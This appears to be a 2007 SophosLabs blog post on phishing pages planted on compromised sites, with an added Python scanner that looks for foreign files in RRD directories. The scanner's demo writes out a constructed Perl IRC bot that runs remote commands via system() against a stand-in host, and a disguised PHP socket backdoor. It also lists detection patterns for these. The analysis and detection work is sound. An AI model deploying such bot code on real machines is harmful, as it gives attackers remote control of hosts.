Sophos

28 May 2007 13:15 GMT

A Prickly Problem

Another relatively quiet shift on the malware front, but a little more life within the spam feeds. A number of phishing attacks were successfully intercepted today. The usual mixture of targeted brands was present, including Brazilian, American and British banks. Some of the attacks used domains set up specifically for the job; others used legitimate sites that had been compromised. As noted in a previous post on phishing attacks using compromised sites, digging a little deeper can often reveal some interesting information. Two of the cases probed today are discussed below.

The first interesting phish today targeted Poste Italiane Group (again).

pi-cactus.gif

Looking at the URL of the phish site, it was clearly hosted on a compromised machine. The host appears to run RRDtool (a logging and graphing application) and Cacti (a web frontend to it). Someone compromised the site and uploaded additional content into one of the directories holding RRD files. Aside from the phishing pages, MailMailer (from softSWOT) is present, suggesting that the compromised site is also being used to send spam. A Perl remote shell was also discovered; once running, it connects to a remote IRC server and awaits commands. Shells such as this are typically used to scan for further vulnerable machines and to launch exploit or denial of service (DoS) attacks.
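As an added example (not part of the original post, and not SophosLabs tooling), the following Python script shows the kind of check an administrator of such a Cacti/RRDtool host could run after a report like this one: walk the RRD data directory, flag anything that is not an RRD database, and look inside each foreign file for the indicators of an IRC bot or mailer script. The directory layout, file names and indicator patterns are all constructed for this example; the one fact it relies on is that every RRDtool database file begins with the cookie "RRD", so a script renamed to `.rrd` is still caught.

```python
import re
import tempfile
from pathlib import Path

# Illustrative indicators of an uploaded IRC bot or mass-mailer script.
# Patterns chosen for this example, not SophosLabs detection data.
SCRIPT_INDICATORS = {
    "perl-socket": re.compile(rb"IO::Socket::INET"),       # Perl outbound socket
    "php-socket": re.compile(rb"\bfsockopen\s*\("),        # PHP outbound socket
    "irc-nick": re.compile(rb"\bNICK\s+\S"),               # IRC registration
    "irc-join": re.compile(rb"\bJOIN\s+#"),                # joining a command channel
    "irc-privmsg": re.compile(rb"\bPRIVMSG\b"),            # command traffic
    "mailer": re.compile(rb"\bmail\s*\(|sendmail", re.I),  # spam sending
}
RRD_COOKIE = b"RRD"  # every RRDtool database file starts with this cookie


def classify_file(path):
    """Return the reasons a file does not belong in an RRD data directory."""
    data = path.read_bytes()
    reasons = []
    if path.suffix.lower() == ".rrd":
        # A genuine RRD file carries the cookie; a renamed script does not.
        if not data.startswith(RRD_COOKIE):
            reasons.append("rrd-suffix-but-no-RRD-cookie")
    else:
        reasons.append("unexpected-suffix")
    reasons += [name for name, pat in SCRIPT_INDICATORS.items() if pat.search(data)]
    return reasons


def scan_rrd_dir(root):
    """Walk an RRD directory and report every file with at least one reason."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            reasons = classify_file(path)
            if reasons:
                report[path.relative_to(root).as_posix()] = reasons
    return report


def build_demo_dir():
    """Constructed sample tree: one legitimate RRD file plus planted content."""
    root = Path(tempfile.mkdtemp(prefix="rra-"))
    # Legitimate database: RRD cookie, version string, then data.
    (root / "cpu.rrd").write_bytes(b"RRD\x000003\x00" + b"\x00" * 64)
    # Phishing page dropped into a subdirectory (no script indicators).
    (root / "poste").mkdir()
    (root / "poste" / "login.html").write_bytes(
        b"<form action='post.php'>Poste Italiane</form>")
    # Hidden Perl IRC bot of the kind described in the post (constructed).
    (root / ".bot.pl").write_bytes(
        b"use IO::Socket::INET;\n"
        b"$s = IO::Socket::INET->new(PeerAddr => 'irc.example.invalid:6667');\n"
        b"print $s \"NICK rrdbot\\r\\n\";\n"
        b"print $s \"JOIN #cmd\\r\\n\";\n"
        b"while (<$s>) { if (/PRIVMSG .* :!run (.*)/) { system($1) } }\n")
    # PHP backdoor renamed to look like an RRD file.
    (root / "net.rrd").write_bytes(
        b"<?php $f = fsockopen('irc.example.invalid', 6667); ?>")
    return root


if __name__ == "__main__":
    for name, reasons in scan_rrd_dir(build_demo_dir()).items():
        print(f"{name}: {', '.join(reasons)}")
```

The suffix check alone finds the phishing page and the bot; the cookie check is what catches the renamed PHP file, which is why the script does not trust file extensions in either direction.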

One of the other compromised sites used by a phishing attack was uncovered when investigating an attack against Wells Fargo.

wf-mail.gif

Again, inspecting the URL of the phish site revealed it to be hosted on a compromised site, in this case a reasonably popular news/sport/music portal. Here the hackers seem happy to brag openly of their achievements, dropping their tag within the compromised site (obscenity removed from image):

alban-hack.gif

These (and many other similar) cases reflect the freedom that intruders have to upload whatever content they wish to a compromised site. Of course, nowadays that content is usually geared towards financial gain (e.g. a phishing attack or the installation of malware).

Fraser Howard, SophosLabs UK